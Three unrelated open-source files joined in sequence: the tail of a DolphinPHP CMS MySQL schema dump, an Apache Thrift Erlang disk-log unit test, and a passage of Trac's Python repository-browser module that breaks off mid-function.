INSERT INTO `dp_cms_menu` VALUES ('6', '1', '5', '0', '0', '2', '子菜单', 'http://www.dolphinphp.com', '', '', '_self', '1492347388', '1492347520', '100', '1');
-- -----------------------------
-- Table structure for `dp_cms_model`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_model`;
CREATE TABLE `dp_cms_model` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '模型名称',
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '模型标题',
`table` varchar(64) NOT NULL DEFAULT '' COMMENT '附加表名称',
`type` tinyint(2) NOT NULL DEFAULT '1' COMMENT '模型类别:0-系统模型,1-普通模型,2-独立模型',
`icon` varchar(64) NOT NULL,
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`system` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否系统模型',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='内容模型表';
-- -----------------------------
-- Table structure for `dp_cms_nav`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_nav`;
CREATE TABLE `dp_cms_nav` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`tag` varchar(32) NOT NULL DEFAULT '' COMMENT '导航标识',
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '菜单标题',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='导航表';
-- -----------------------------
-- Table data for `dp_cms_nav`
-- -----------------------------
INSERT INTO `dp_cms_nav` VALUES ('1', 'main_nav', '顶部导航', '1492345083', '1492345083', '1');
INSERT INTO `dp_cms_nav` VALUES ('2', 'about_nav', '底部关于', '1492346685', '1492346685', '1');
INSERT INTO `dp_cms_nav` VALUES ('3', 'support_nav', '服务与支持', '1492346715', '1492346715', '1');
-- -----------------------------
-- Table structure for `dp_cms_page`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_page`;
CREATE TABLE `dp_cms_page` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(64) NOT NULL DEFAULT '' COMMENT '单页标题',
`content` mediumtext NOT NULL COMMENT '单页内容',
`keywords` varchar(32) NOT NULL DEFAULT '' COMMENT '关键词',
`description` varchar(250) NOT NULL DEFAULT '' COMMENT '页面描述',
`template` varchar(32) NOT NULL DEFAULT '' COMMENT '模板文件',
`cover` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '单页封面',
`view` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '阅读量',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='单页表';
-- -----------------------------
-- 表数据 `dp_cms_page`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_slider`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_slider`;
CREATE TABLE `dp_cms_slider` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '标题',
`cover` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '封面id',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接地址',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='滚动图片表';
-- -----------------------------
-- 表数据 `dp_cms_slider`
-- -----------------------------
-- -----------------------------
-- 表结构 `dp_cms_support`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_support`;
CREATE TABLE `dp_cms_support` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(128) NOT NULL DEFAULT '' COMMENT '客服名称',
`qq` varchar(16) NOT NULL DEFAULT '' COMMENT 'QQ',
`msn` varchar(100) NOT NULL DEFAULT '' COMMENT 'msn',
`taobao` varchar(100) NOT NULL DEFAULT '' COMMENT 'taobao',
`alibaba` varchar(100) NOT NULL DEFAULT '' COMMENT 'alibaba',
`skype` varchar(100) NOT NULL DEFAULT '' COMMENT 'skype',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`sort` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '排序',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='客服表';
-- -----------------------------
-- 表数据 `dp_cms_support`
-- -----------------------------
| {
"pile_set_name": "Github"
} |
%%
%% Licensed to the Apache Software Foundation (ASF) under one
%% or more contributor license agreements. See the NOTICE file
%% distributed with this work for additional information
%% regarding copyright ownership. The ASF licenses this file
%% to you under the Apache License, Version 2.0 (the
%% "License"); you may not use this file except in compliance
%% with the License. You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
-module(test_disklog).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
disklog_test() ->
{ok, TransportFactory} =
thrift_disk_log_transport:new_transport_factory(
test_disklog,
[{file, "./test_log"},
{size, {1024*1024, 10}}]),
{ok, ProtocolFactory} =
thrift_binary_protocol:new_protocol_factory( TransportFactory, []),
{ok, Proto} = ProtocolFactory(),
{ok, Client0} = thrift_client:new(Proto, thrift_test_thrift),
io:format("Client started~n"),
% We have to make oneway calls into this client only since otherwise it
% will try to read from the disklog and go boom.
{Client1, {ok, ok}} = thrift_client:call(Client0, testOneway, [16#deadbeef]),
io:format("Call written~n"),
% Use the send_call method to write a non-oneway call into the log
{Client2, ok} =
thrift_client:send_call(Client1, testString, [<<"hello world">>]),
io:format("Non-oneway call sent~n"),
{_Client3, ok} = thrift_client:close(Client2),
io:format("Client closed~n"),
lists:foreach(fun(File) -> file:delete(File) end, [
"./test_log.1",
"./test_log.idx",
"./test_log.siz"
]),
io:format("Cleaning up test files~n"),
ok.
disklog_base64_test() ->
{ok, TransportFactory} =
thrift_disk_log_transport:new_transport_factory(
test_disklog,
[{file, "./test_b64_log"},
{size, {1024*1024, 10}}]),
{ok, B64Factory} =
thrift_base64_transport:new_transport_factory(TransportFactory),
{ok, BufFactory} =
thrift_buffered_transport:new_transport_factory(B64Factory),
{ok, ProtocolFactory} =
thrift_binary_protocol:new_protocol_factory(BufFactory, []),
{ok, Proto} = ProtocolFactory(),
{ok, Client0} = thrift_client:new(Proto, thrift_test_thrift),
io:format("Client started~n"),
% We have to make oneway calls into this client only since otherwise
% it will try to read from the disklog and go boom.
{Client1, {ok, ok}} = thrift_client:call(Client0, testOneway, [16#deadbeef]),
io:format("Call written~n"),
% Use the send_call method to write a non-oneway call into the log
{Client2, ok} =
thrift_client:send_call(Client1, testString, [<<"hello world">>]),
io:format("Non-oneway call sent~n"),
{_Client3, ok} = thrift_client:close(Client2),
io:format("Client closed~n"),
lists:foreach(fun(File) -> file:delete(File) end, [
"./test_b64_log.1",
"./test_b64_log.idx",
"./test_b64_log.siz"
]),
io:format("Cleaning up test files~n"),
ok.
-endif.
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2020 Edgewall Software
# Copyright (C) 2003-2005 Jonas Borgström <[email protected]>
# Copyright (C) 2005-2007 Christian Boos <[email protected]>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at https://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <[email protected]>
import re
from datetime import datetime, timedelta
from fnmatch import fnmatchcase
from trac.config import BoolOption, ListOption, Option
from trac.core import *
from trac.mimeview.api import IHTMLPreviewAnnotator, Mimeview, is_binary
from trac.perm import IPermissionRequestor, PermissionError
from trac.resource import Resource, ResourceNotFound
from trac.util import as_bool, embedded_numbers
from trac.util.datefmt import datetime_now, http_date, to_datetime, utc
from trac.util.html import Markup, escape, tag
from trac.util.text import exception_to_unicode, shorten_line
from trac.util.translation import _, cleandoc_
from trac.versioncontrol.api import NoSuchChangeset, RepositoryManager
from trac.versioncontrol.web_ui.util import *
from trac.web.api import IRequestHandler, RequestDone
from trac.web.chrome import (Chrome, INavigationContributor, add_ctxtnav,
add_link, add_script, add_stylesheet,
prevnext_nav, web_context)
from trac.wiki.api import IWikiMacroProvider, IWikiSyntaxProvider, parse_args
from trac.wiki.formatter import format_to_html, format_to_oneliner
CHUNK_SIZE = 4096
class IPropertyRenderer(Interface):
"""Render node properties in TracBrowser and TracChangeset views."""
def match_property(name, mode):
"""Indicate whether this renderer can treat the given property
`mode` is the current rendering context, which can be:
- 'browser' rendered in the browser view
- 'changeset' rendered in the changeset view as a node property
- 'revprop' rendered in the changeset view as a revision property
Other identifiers might be used by plugins, so it's advised to simply
ignore unknown modes.
Returns a quality number, ranging from 0 (unsupported) to 9
(''perfect'' match).
"""
def render_property(name, mode, context, props):
"""Render the given property.
`name` is the property name as given to `match()`,
`mode` is the same as for `match_property`,
`context` is the context for the node being render
(useful when the rendering depends on the node kind) and
`props` is the collection of the corresponding properties
(i.e. the `node.get_properties()`).
The rendered result can be one of the following:
- `None`: the property will be skipped
- an `unicode` value: the property will be displayed as text
- a `RenderedProperty` instance: the property will only be displayed
using the instance's `content` attribute, and the other attributes
will also be used in some display contexts (like `revprop`)
- `Markup` or `Fragment`: the property will be displayed
normally, using that content as a block-level markup
"""
class RenderedProperty(object):
def __init__(self, name=None, name_attributes=None,
content=None, content_attributes=None):
self.name = name
self.name_attributes = name_attributes
self.content = content
self.content_attributes = content_attributes
class DefaultPropertyRenderer(Component):
"""Default version control property renderer."""
implements(IPropertyRenderer)
def match_property(self, name, mode):
return 1
def render_property(self, name, mode, context, props):
# No special treatment besides respecting newlines in values.
value = props[name]
if value and '\n' in value:
value = Markup(''.join('<br />%s' % escape(v)
for v in value.split('\n')))
return value
class WikiPropertyRenderer(Component):
"""Wiki text property renderer."""
implements(IPropertyRenderer)
wiki_properties = ListOption('browser', 'wiki_properties',
'trac:description',
doc="""Comma-separated list of version control properties to render
as wiki content in the repository browser.
""")
oneliner_properties = ListOption('browser', 'oneliner_properties',
'trac:summary',
doc="""Comma-separated list of version control properties to render
as oneliner wiki content in the repository browser.
""")
def match_property(self, name, mode):
return 4 if name in self.wiki_properties \
or name in self.oneliner_properties else 0
def render_property(self, name, mode, context, props):
if name in self.wiki_properties:
return format_to_html(self.env, context, props[name])
else:
return format_to_oneliner(self.env, context, props[name])
class TimeRange(object):
min = datetime(1, 1, 1, 0, 0, 0, 0, utc) # tz aware version of datetime.min
def __init__(self, base):
self.oldest = self.newest = base
self._total = None
def seconds_between(self, dt1, dt2):
delta = dt1 - dt2
return delta.days * 24 * 3600 + delta.seconds
def to_seconds(self, dt):
return self.seconds_between(dt, TimeRange.min)
def from_seconds(self, secs):
return TimeRange.min + timedelta(*divmod(secs, 24* 3600))
def relative(self, datetime):
if self._total is None:
self._total = float(self.seconds_between(self.newest, self.oldest))
age = 1.0
if self._total:
age = self.seconds_between(datetime, self.oldest) / self._total
return age
def insert(self, datetime):
self._total = None
self.oldest = min(self.oldest, datetime)
self.newest = max(self.newest, datetime)
class BrowserModule(Component):
implements(INavigationContributor, IPermissionRequestor, IRequestHandler,
IWikiSyntaxProvider, IHTMLPreviewAnnotator,
IWikiMacroProvider)
property_renderers = ExtensionPoint(IPropertyRenderer)
realm = RepositoryManager.source_realm
downloadable_paths = ListOption('browser', 'downloadable_paths',
'/trunk, /branches/*, /tags/*',
doc="""List of repository paths that can be downloaded.
Leave this option empty if you want to disable all downloads, otherwise
set it to a comma-separated list of authorized paths (those paths are
glob patterns, i.e. "*" can be used as a wild card). In a
multi-repository environment, the path must be qualified with the
repository name if the path does not point to the default repository
(e.g. /reponame/trunk). Note that a simple prefix matching is
performed on the paths, so aliases won't get automatically resolved.
""")
color_scale = BoolOption('browser', 'color_scale', True,
doc="""Enable colorization of the ''age'' column.
This uses the same color scale as the source code annotation:
blue is older, red is newer.
""")
NEWEST_COLOR = (255, 136, 136)
newest_color = Option('browser', 'newest_color', repr(NEWEST_COLOR),
doc="""(r,g,b) color triple to use for the color corresponding
to the newest color, for the color scale used in ''blame'' or
the browser ''age'' column if `color_scale` is enabled.
""")
OLDEST_COLOR = (136, 136, 255)
oldest_color = Option('browser', 'oldest_color', repr(OLDEST_COLOR),
doc="""(r,g,b) color triple to use for the color corresponding
to the oldest color, for the color scale used in ''blame'' or
the browser ''age'' column if `color_scale` is enabled.
""")
intermediate_point = Option('browser', 'intermediate_point', '',
doc="""If set to a value between 0 and 1 (exclusive), this will be the
point chosen to set the `intermediate_color` for interpolating
the color value.
""")
intermediate_color = Option('browser', 'intermediate_color', '',
doc="""(r,g,b) color triple to use for the color corresponding
to the intermediate color, if two linear interpolations are used
for the color scale (see `intermediate_point`).
If not set, the intermediate color between `oldest_color` and
`newest_color` will be used.
""")
render_unsafe_content = BoolOption('browser', 'render_unsafe_content',
'false',
"""Whether raw files should be rendered in the browser, or only made
downloadable.
Pretty much any file may be interpreted as HTML by the browser,
which allows a malicious user to create a file containing cross-site
scripting attacks.
For open repositories where anyone can check-in a file, it is
recommended to leave this option disabled.""")
hidden_properties = ListOption('browser', 'hide_properties', 'svk:merge',
doc="""Comma-separated list of version control properties to hide from
the repository browser.
""")
# public methods
def get_custom_colorizer(self):
"""Returns a converter for values from [0.0, 1.0] to a RGB triple."""
def interpolate(old, new, value):
# Provides a linearly interpolated color triple for `value`
# which must be a floating point value between 0.0 and 1.0
return tuple([int(b + (a - b) * value) for a, b in zip(new, old)])
def parse_color(rgb, default):
# Get three ints out of a `rgb` string or return `default`
try:
t = tuple([int(v) for v in re.split(r'(\d+)', rgb)[1::2]])
return t if len(t) == 3 else default
except ValueError:
return default
newest_color = parse_color(self.newest_color, self.NEWEST_COLOR)
oldest_color = parse_color(self.oldest_color, self.OLDEST_COLOR)
try:
intermediate = float(self.intermediate_point)
except ValueError:
intermediate = None
if intermediate:
intermediate_color = parse_color(self.intermediate_color, None)
if not intermediate_color:
intermediate_color = tuple([(a + b) / 2 for a, b in
zip(newest_color, oldest_color)])
def colorizer(value):
if value <= intermediate:
value = value / intermediate
return interpolate(oldest_color, intermediate_color, value)
else:
value = (value - intermediate) / (1.0 - intermediate)
return interpolate(intermediate_color, newest_color, value)
else:
def colorizer(value):
return interpolate(oldest_color, newest_color, value)
return colorizer
# INavigationContributor methods
def get_active_navigation_item(self, req):
return 'browser'
def get_navigation_items(self, req):
rm = RepositoryManager(self.env)
if any(repos.is_viewable(req.perm) for repos
in rm.get_real_repositories()):
yield ('mainnav', 'browser',
tag.a(_('Browse Source'), href=req.href.browser()))
# IPermissionRequestor methods
def get_permission_actions(self):
return ['BROWSER_VIEW', 'FILE_VIEW']
# IRequestHandler methods
def match_request(self, req):
match = re.match(r'/(export|browser|file)(/.*)?$', req.path_info)
if match:
mode, path = match.groups()
if mode == 'export':
if path and '/' in path:
path_elts = path.split('/', 2)
if len(path_elts) != 3:
return False
path = path_elts[2]
req.args['rev'] = path_elts[1]
req.args['format'] = 'raw'
elif mode == 'file':
req.redirect(req.href.browser(path, rev=req.args.get('rev'),
format=req.args.get('format')),
permanent=True)
req.args['path'] = path or '/'
return True
def process_request(self, req):
presel = req.args.get('preselected')
if presel and (presel + '/').startswith(req.href.browser() + '/'):
req.redirect(presel)
path = req.args.get('path', '/')
rev = req.args.get('rev', '')
if rev.lower() in ('', 'head'):
rev = None
format = req.args.get('format')
order = req.args.get('order', 'name').lower()
desc = 'desc' in req.args
rm = RepositoryManager(self.env)
all_repositories = rm.get_all_repositories()
reponame, repos, path = rm.get_repository_by_path(path)
# Repository index
show_index = not reponame and path == '/'
if show_index:
if repos and (as_bool(all_repositories[''].get('hidden'))
or not repos.is_viewable(req.perm)):
repos = None
if not repos and reponame:
raise ResourceNotFound(_("Repository '%(repo)s' not found",
repo=reponame))
if reponame and reponame != repos.reponame: # Redirect alias
qs = req.query_string
req.redirect(req.href.browser(repos.reponame or None, path)
+ ('?' + qs if qs else ''))
reponame = repos.reponame if repos else None
# Find node for the requested path/rev
context = web_context(req)
node = None
changeset = None
display_rev = lambda rev: rev
if repos:
try:
if rev:
rev = repos.normalize_rev(rev)
# If `rev` is `None`, we'll try to reuse `None` consistently,
# as a special shortcut to the latest revision.
rev_or_latest = rev or repos.youngest_rev
node = get_existing_node(req, repos, path, rev_or_latest)
except NoSuchChangeset as e:
raise ResourceNotFound(e, _('Invalid changeset number'))
if node:
try:
# use changeset instance to retrieve branches and tags
changeset = repos.get_changeset(node.rev)
except NoSuchChangeset:
pass
context = context.child(repos.resource.child(self.realm, path,
version=rev_or_latest))
display_rev = repos.display_rev
# Prepare template data
path_links = get_path_links(req.href, reponame, path, rev,
order, desc)
repo_data = dir_data = file_data = None
if show_index:
repo_data = self._render_repository_index(
context, all_repositories, order, desc)
if node:
if not node.is_viewable(req.perm):
raise PermissionError('BROWSER_VIEW' if node.isdir else
'FILE_VIEW', node.resource, self.env)
if node.isdir:
if format in ('zip',): # extension point here...
self._render_zip(req, context, repos, node, rev)
# not reached
dir_data = self._render_dir(req, repos, node, rev, order, desc)
elif node.isfile:
file_data = self._render_file(req, context, repos, node, rev)
if not repos and not (repo_data and repo_data['repositories']):
# If no viewable repositories, check permission instead of
# repos.is_viewable()
req.perm.require('BROWSER_VIEW')
if show_index:
raise ResourceNotFound(_("No viewable repositories"))
else:
raise ResourceNotFound(_("No node %(path)s", path=path))
quickjump_data = properties_data = None
if node and not req.is_xhr:
properties_data = self.render_properties(
'browser', context, node.get_properties())
quickjump_data = list(repos.get_quickjump_entries(rev))
data = {
'context': context, 'reponame': reponame, 'repos': repos,
'repoinfo': all_repositories.get(reponame or ''),
'path': path, 'rev': node and node.rev, 'stickyrev': rev,
'display_rev': display_rev, 'changeset': changeset,
'created_path': node and node.created_path,
'created_rev': node and node.created_rev,
'properties': properties_data,
'path_links': path_links,
'order': order, 'desc': 1 if desc else None,
'repo': repo_data, 'dir': dir_data, 'file': file_data,
'quickjump_entries': quickjump_data,
'wiki_format_messages':
self.config['changeset'].getbool('wiki_format_messages'),
}
if req.is_xhr: # render and return the content only
return 'dir_entries.html', data
if dir_data or repo_data:
add_script(req, 'common/js/expand_dir.js')
add_script(req, 'common/js/keyboard_nav.js')
# Links for contextual navigation
if node:
if node.isfile:
prev_rev = repos.previous_rev(rev=node.created_rev,
path=node.created_path)
if prev_rev:
href = req.href.browser(reponame,
node.created_path, rev=prev_rev)
add_link(req, 'prev', href,
_('Revision %(num)s', num=display_rev(prev_rev)))
if rev is not None:
add_link(req, 'up', req.href.browser(reponame,
node.created_path))
next_rev = repos.next_rev(rev=node.created_rev,
path=node.created_path)
if next_rev:
href = req.href.browser(reponame, node.created_path,
rev=next_rev)
add_link(req, 'next', href,
_('Revision %(num)s', num=display_rev(next_rev)))
prevnext_nav(req, _('Previous Revision'), _('Next Revision'),
_('Latest Revision'))
else:
if path != '/':
add_link(req, 'up', path_links[-2]['href'],
_('Parent directory'))
add_ctxtnav(req, tag.a(_('Last Change'),
href=req.href.changeset(node.created_rev, reponame,
node.created_path)))
if node.isfile:
annotate = data['file']['annotate']
if annotate:
add_ctxtnav(req, _('Normal'),
title=_('View file without annotations'),
href=req.href.browser(reponame,
node.created_path,
rev=rev))
if annotate != 'blame':
add_ctxtnav(req, _('Blame'),
title=_('Annotate each line with the last '
'changed revision '
'(this can be time consuming...)'),
href=req.href.browser(reponame,
node.created_path,
rev=rev,
annotate='blame'))
add_ctxtnav(req, _('Revision Log'),
href=req.href.log(reponame, path, rev=rev))
path_url = repos.get_path_url(path, rev)
if path_url:
if path_url.startswith('//'):
path_url = req.scheme + ':' + path_url
add_ctxtnav(req, _('Repository URL'), href=path_url)
add_stylesheet(req, 'common/css/browser.css')
return 'browser.html', data
# Internal methods
def _render_repository_index(self, context, all_repositories, order, desc):
# Color scale for the age column
timerange = custom_colorizer = None
if self.color_scale:
custom_colorizer = self.get_custom_colorizer()
rm = RepositoryManager(self.env)
repositories = []
for reponame, repoinfo in all_repositories.iteritems():
if not reponame or as_bool(repoinfo.get('hidden')):
continue
try:
repos = rm.get_repository(reponame)
except TracError as err:
entry = (reponame, repoinfo, None, None,
exception_to_unicode(err), None)
else:
if repos:
if not repos.is_viewable(context.perm):
continue
try:
youngest = repos.get_changeset(repos.youngest_rev)
except NoSuchChangeset:
youngest = None
if self.color_scale and youngest:
if not timerange:
timerange = TimeRange(youngest.date)
else:
timerange.insert(youngest.date)
raw_href = self._get_download_href(context.href, repos,
None, None)
entry = (reponame, repoinfo, repos, youngest, None,
raw_href)
else:
entry = (reponame, repoinfo, None, None, u"\u2013", None)
if entry[4] is not None: # Check permission in case of error
root = Resource('repository', reponame).child(self.realm, '/')
if 'BROWSER_VIEW' not in context.perm(root):
continue
repositories.append(entry)
# Ordering of repositories
if order == 'date':
def repo_order(args):
reponame, repoinfo, repos, youngest, err, href = args
return (youngest.date if youngest else to_datetime(0),
embedded_numbers(reponame.lower()))
elif order == 'author':
def repo_order(args):
reponame, repoinfo, repos, youngest, err, href = args
return (youngest.author.lower() if youngest else '',
embedded_numbers(reponame.lower()))
else:
def repo_order(args):
reponame, repoinfo, repos, youngest, err, href = args
return embedded_numbers(reponame.lower())
repositories = sorted(repositories, key=repo_order, reverse=desc)
return {'repositories' : repositories,
'timerange': timerange, 'colorize_age': custom_colorizer}
def _render_dir(self, req, repos, node, rev, order, desc):
req.perm(node.resource).require('BROWSER_VIEW')
download_href = self._get_download_href
# Entries metadata
class entry(object):
_copy = 'name rev created_rev kind isdir path content_length' \
.split()
__slots__ = _copy + ['raw_href']
def __init__(self, node):
for f in entry._copy:
setattr(self, f, getattr(node, f))
self.raw_href = download_href(req.href, repos, node, rev)
entries = [entry(n) for n in node.get_entries()
if n.is_viewable(req.perm)]
changes = get_changes(repos, [i.created_rev for i in entries],
self.log)
if rev:
newest = repos.get_changeset(rev).date
else:
newest = datetime_now(req.tz)
# Color scale for the age column
timerange = custom_colorizer = None
if self.color_scale:
timerange = TimeRange(newest)
max_s = req.args.get('range_max_secs')
min_s = req.args.get('range_min_secs')
parent_range = [timerange.from_seconds(int(s))
for s in [max_s, min_s] if s]
this_range = [c.date for c in changes.values() if c]
for dt in this_range + parent_range:
timerange.insert(dt)
custom_colorizer = self.get_custom_colorizer()
# Ordering of entries
if order == 'date':
def file_order(a):
return (changes[a.created_rev].date,
embedded_numbers(a.name.lower()))
elif order == 'size':
def file_order(a):
return (a.content_length,
embedded_numbers(a.name.lower()))
elif order == 'author':
def file_order(a):
return (changes[a.created_rev].author.lower(),
embedded_numbers(a.name.lower()))
else:
def file_order(a):
return embedded_numbers(a.name.lower())
dir_order = 1 if desc else -1
def browse_order(a):
return dir_order if a.isdir else 0, file_order(a)
entries = sorted(entries, key=browse_order, reverse=desc)
# ''Zip Archive'' alternate link
zip_href = self._get_download_href(req.href, repos, node, rev)
if zip_href:
add_link(req, 'alternate', zip_href, _('Zip Archive'),
'application/zip', 'zip')
return {'entries': entries, 'changes': changes,
'timerange': timerange, 'colorize_age': custom_colorizer,
'range_max_secs': (timerange and
timerange.to_seconds(timerange.newest)),
'range_min_secs': (timerange and
timerange.to_seconds(timerange.oldest)),
}
def _iter_nodes(self, node):
stack = [node]
while stack:
node = stack.pop()
yield node
if node.isdir:
stack.extend(sorted(node.get_entries(),
key=lambda x: x.name,
reverse=True))
def _render_zip(self, req, context, repos, root_node, rev=None):
if not self.is_path_downloadable(repos, root_node.path):
raise TracError(_("Path not available for download"))
req.perm(context.resource).require('FILE_VIEW')
root_path = root_node.path.rstrip('/')
if root_path:
archive_name = root_node.name
else:
archive_name = repos.reponame or 'repository'
filename = '%s-%s.zip' % (archive_name, root_node.rev)
render_zip(req, filename, repos, root_node, self._iter_nodes)
def _render_file(self, req, context, repos, node, rev=None):
req.perm(node.resource).require('FILE_VIEW')
mimeview = Mimeview(self.env)
# MIME type detection
with content_closing(node.get_processed_content()) as content:
chunk = content.read(CHUNK_SIZE)
mime_type = node.content_type
if not mime_type or mime_type == 'application/octet-stream':
mime_type = mimeview.get_mimetype(node.name, chunk) or \
mime_type or 'text/plain'
# Eventually send the file directly
format = req.args.get('format')
if format in ('raw', 'txt'):
req.send_response(200)
req.send_header('Content-Type',
'text/plain' if format == 'txt' else mime_type)
req.send_header('Last-Modified', http_date(node.last_modified))
if rev is None:
req.send_header('Pragma', 'no-cache')
req.send_header('Cache-Control', 'no-cache')
req.send_header('Expires', 'Fri, 01 Jan 1999 00:00:00 GMT')
if not self.render_unsafe_content:
# Force browser to download files instead of rendering
# them, since they might contain malicious code enabling
# XSS attacks
req.send_header('Content-Disposition', 'attachment')
req.end_headers()
# Note: don't pass an iterable instance to RequestDone, instead
# call req.write() with each chunk here to avoid SEGVs (#11805)
while chunk:
req.write(chunk)
chunk = content.read(CHUNK_SIZE)
raise RequestDone
# The changeset corresponding to the last change on `node`
# is more interesting than the `rev` changeset.
changeset = repos.get_changeset(node.created_rev)
# add ''Plain Text'' alternate link if needed
if not is_binary(chunk) and mime_type != 'text/plain':
plain_href = req.href.browser(repos.reponame or None,
node.path, rev=rev,
format='txt')
add_link(req, 'alternate', plain_href, _('Plain Text'),
'text/plain')
# add ''Original Format'' alternate link (always)
raw_href = req.href.export(rev or repos.youngest_rev,
repos.reponame or None, node.path)
add_link(req, 'alternate', raw_href, _('Original Format'),
mime_type)
self.log.debug("Rendering preview of node %s@%s with "
"mime-type %s", node.name, rev, mime_type)
add_stylesheet(req, 'common/css/code.css')
annotations = ['lineno']
annotate = req.args.get('annotate')
if annotate:
annotations.insert(0, annotate)
with content_closing(node.get_processed_content()) as content:
preview_data = mimeview.preview_data(context, content,
node.get_content_length(),
mime_type, node.created_path,
raw_href,
annotations=annotations,
force_source=bool(annotate))
return {
'changeset': changeset,
'size': node.content_length,
'preview': preview_data,
'annotate': annotate,
}
def _get_download_href(self, href, repos, node, rev):
"""Return the URL for downloading a file, or a directory as a ZIP."""
if node is not None and node.isfile:
return href.export(rev or 'HEAD', repos.reponame or None,
node.path)
path = '' if node is None else node.path.strip('/')
if self.is_path_downloadable(repos, path):
return href.browser(repos.reponame or None, path,
rev=rev or repos.youngest_rev, format='zip')
# public methods
def is_path_downloadable(self, repos, path):
if repos.reponame:
path = repos.reponame + '/' + path
return any(fnmatchcase(path, dp.strip('/'))
for dp in self.downloadable_paths)
def render_properties(self, mode, context, props):
"""Prepare rendering of a collection of properties."""
return filter(None, [self.render_property(name, mode, context, props)
for name in sorted(props)])
def render_property(self, name, mode, context, props):
"""Renders a node property to HTML."""
if name in self.hidden_properties:
return
candidates = []
for renderer in self.property_renderers:
quality = renderer.match_property(name, mode)
if quality > 0:
candidates.append((quality, renderer))
candidates.sort(reverse=True)
for (quality, renderer) in candidates:
try:
rendered = renderer.render_property(name, mode, context, props)
if not rendered:
return rendered
if isinstance(rendered, RenderedProperty):
value = rendered.content
else:
value = rendered
rendered = None
prop = {'name': name, 'value': value, 'rendered': rendered}
return prop
except Exception as e:
self.log.warning('Rendering failed for property %s with '
'renderer %s: %s', name,
renderer.__class__.__name__,
exception_to_unicode(e, traceback=True))
# IWikiSyntaxProvider methods
def get_wiki_syntax(self):
return []
def get_link_resolvers(self):
"""TracBrowser link resolvers.
`source:` and `browser:`
* simple paths (/dir/file)
* paths at a given revision (/dir/file@234)
* paths with line number marks (/dir/file@234:10,20-30)
* paths with line number anchor (/dir/file@234#L100)
Marks and anchor can be combined.
The revision must be present when specifying line numbers.
In the few cases where it would be redundant (e.g. for tags), the
revision number itself can be omitted: /tags/v10/file@100-110#L99
"""
return [('repos', self._format_browser_link),
('export', self._format_export_link),
('source', self._format_browser_link),
('browser', self._format_browser_link)]
def _format_export_link(self, formatter, ns, export, label):
export, query, fragment = formatter.split_link(export)
if ':' in export:
rev, path = export.split(':', 1)
elif '@' in export:
path, rev = export.split('@', 1)
else:
rev, path = None, export
node, raw_href, title = self._get_link_info(path, rev, formatter.href,
formatter.perm)
if raw_href:
return tag.a(label, class_='export', href=raw_href + fragment,
title=title)
return tag.a(label, class_='missing export')
def _format_browser_link(self, formatter, ns, path, label):
path, query, fragment = formatter.split_link(path)
rev = marks = None
match = self.PATH_LINK_RE.match(path)
if match:
path, rev, marks = match.groups()
href = formatter.href
src_href = href.browser(path, rev=rev, marks=marks) + query + fragment
